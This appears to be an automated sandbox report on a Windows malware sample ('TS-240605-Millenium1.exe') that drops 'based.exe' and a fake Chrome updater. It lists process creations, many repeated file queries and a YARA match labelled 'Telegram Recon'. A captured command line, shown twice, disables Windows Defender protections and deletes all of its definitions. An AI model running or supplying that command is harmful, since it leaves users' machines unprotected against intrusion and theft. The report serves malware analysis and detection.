Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find ":"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend

Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp

Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Code function: 0_2_00007FF6CEB4A620 cpuid

0_2_00007FF6CEB4A620

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

5_2_0037D0AB

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\libcrypto-3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\python311.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Queries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\libcrypto-3.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\libffi-8.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\libssl-3.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\python311.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
